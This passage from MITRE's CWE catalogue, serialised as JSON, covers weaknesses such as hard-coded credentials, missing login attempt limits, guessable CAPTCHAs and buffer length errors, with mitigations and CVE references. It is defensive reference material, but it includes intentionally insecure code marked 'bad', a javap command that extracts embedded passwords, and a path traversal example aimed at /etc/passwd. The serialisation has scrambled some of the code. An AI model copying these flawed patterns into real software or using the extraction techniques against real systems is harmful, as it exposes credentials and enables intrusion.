resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22)."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-12-04"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"798":{"attr":{"@_ID":"798","@_Name":"Use of Hard-coded Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.","Extended_Description":{"xhtml:p":["Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the software administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations:","In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place.","The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Inbound: the software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials.","Outbound: the software connects to another system or component, and it contains hard-coded credentials for connecting to that component."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"671","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"257","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If hard-coded passwords are used, it is almost certain that malicious users will gain access to the account in question."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Read Application Data","Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Other"],"Note":"This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"Credential storage in configuration files is findable using black box methods, but the use of hard-coded credentials for an incoming authentication routine typically involves an account that is not visible outside of the code.","Effectiveness":"Moderate"},{"Method":"Automated Static Analysis","Description":"Automated white box techniques have been published for detecting hard-coded credentials for incoming authentication, but there is some expert disagreement regarding their effectiveness and applicability to a broad range of methods."},{"Method":"Manual Static Analysis","Description":"This weakness may be detectable using manual code analysis. Unless authentication is decentralized and applied throughout the software, there can be sufficient time for the analyst to find incoming authentication routines and examine the program logic looking for usage of hard-coded credentials. Configuration files could also be analyzed.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Dynamic Analysis","Description":{"xhtml:p":["For hard-coded credentials in incoming authentication: use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and perform a login. Using call trees or similar artifacts from the output, examine the associated behaviors and see if any of them appear to be comparing the input to a fixed string or value."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Network Sniffer","Forced Path Execution"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].","In Windows environments, the Encrypted File System (EFS) may provide some protection."]}},{"Phase":"Architecture and Design","Description":"For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a \\"first login\\" mode that requires the user to enter a unique strong password or key."},{"Phase":"Architecture and Design","Description":"If the software must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.","Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"For front-end to back-end connections: Three solutions are possible, although none are complete.","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.","Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.","Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks."]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-13"},"Intro_Text":"The following code uses a hard-coded password to connect to a database:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...DriverManager.getConnection(url, \\"scott\\", \\"tiger\\");...","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"javap -c ConnMngr.class","xhtml:div":{"#text":"22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":"This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user \\"scott\\" with a password of \\"tiger\\" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above:"},{"attr":{"@_Demonstrative_Example_ID":"DX-14"},"Intro_Text":"The following code is an example of an internal hard-coded password in the back-end:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password, \\"Mew!\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0)","xhtml:br":""}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (!password.equals(\\"Mew!\\")) {}//Diagnostic Modereturn(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return(0)","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}}}],"Body_Text":"Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this \\"functionality.\\""},{"attr":{"@_Demonstrative_Example_ID":"DX-92"},"Intro_Text":"The following code examples attempt to verify a password using a hard-coded cryptographic key.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int VerifyAdmin(char *password) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (strcmp(password,\\"68af404b513073584c4b6f22b6c63e6b\\")) {}printf(\\"Entering Diagnostic Mode...\\\\n\\");return(1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Incorrect Password!\\\\n\\");return(0);","xhtml:br":["",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean VerifyAdmin(String password) {","xhtml:div":{"#text":"if (password.equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}System.out.println(\\"Incorrect Password!\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Entering Diagnostic Mode...\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int VerifyAdmin(String password) {}","xhtml:div":{"#text":"if (password.Equals(\\"68af404b513073584c4b6f22b6c63e6b\\")) {}Console.WriteLine(\\"Incorrect Password!\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Entering Diagnostic Mode...\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-2772","Description":"SCADA system uses a hard-coded password to protect back-end database containing authorization information, exploited by Stuxnet worm","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772"},{"Reference":"CVE-2010-2073","Description":"FTP server library uses hard-coded usernames and passwords for three default accounts","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073"},{"Reference":"CVE-2010-1573","Description":"Chain: Router firmware uses hard-coded username and password for access to debug functionality, which can be used to execute arbitrary code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1573"},{"Reference":"CVE-2008-2369","Description":"Server uses hard-coded authentication key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2369"},{"Reference":"CVE-2008-0961","Description":"Backup product uses hard-coded username and password, allowing attackers to bypass authentication via the RPC interface","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0961"},{"Reference":"CVE-2008-1160","Description":"Security appliance uses hard-coded password allowing attackers to gain root access","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1160"},{"Reference":"CVE-2006-7142","Description":"Drive encryption product stores hard-coded cryptographic keys for encrypted configuration files in executable programs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142"},{"Reference":"CVE-2005-3716","Description":"VoIP product uses unchangeable hard-coded public credentials that cannot be changed, which allows attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3716"},{"Reference":"CVE-2005-3803","Description":"VoIP product uses hard coded public and private SNMP community strings that cannot be changed, which allows remote attackers to obtain sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3803"},{"Reference":"CVE-2005-0496","Description":"Backup product contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0496"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC03-J","Entry_Name":"Never hard code sensitive information"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-798"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"191"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Key Management Issues&#34; Page 272"}},{"attr":{"@_External_Reference_ID":"REF-729"}},{"attr":{"@_External_Reference_ID":"REF-172"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-798"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"More abstract entry for hard-coded password and hard-coded cryptographic key."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"799":{"attr":{"@_ID":"799","@_Name":"Improper Control of Interaction Frequency","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.","Extended_Description":"This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insufficient anti-automation","Description":"The term \\"insufficient anti-automation\\" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader."},{"Term":"Brute force","Description":"Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Other"],"Impact":["DoS: Resource Consumption (Other)","Bypass Protection Mechanism","Other"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char username[USERNAME_SIZE];char password[PASSWORD_SIZE];while (isValidUser == 0) {}return(SUCCESS);","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int count = 0;while ((isValidUser == 0) &amp;&amp; (count &lt; MAX_ATTEMPTS)) {}if (isValidUser) {}else {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (getNextMessage(socket, username, USERNAME_SIZE) &gt; 0) {}count++;","xhtml:div":{"#text":"if (getNextMessage(socket, password, PASSWORD_SIZE) &gt; 0) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"isValidUser = AuthenticateUser(username, password);","attr":{"@_style":"margin-left:10px;"}}},"xhtml:br":""}},{"#text":"return(SUCCESS);","attr":{"@_style":"margin-left:10px;"}},{"#text":"return(FAIL);","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-1876","Description":"Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1876"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"804":{"attr":{"@_ID":"804","@_Name":"Guessable CAPTCHA","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.","Extended_Description":{"xhtml:p":["An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.","There can be several different causes of a guessable CAPTCHA:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["An audio or visual image that does not have sufficient distortion from the unobfuscated source image.","A question is generated that with a format that can be automatically recognized, such as a math question.","A question for which the number of possible answers is limited, such as birth years or favorite sports teams.","A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular actors.","Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"805":{"attr":{"@_ID":"805","@_Name":"Buffer Access with Incorrect Length Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the length value exceeds the size of the destination, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows 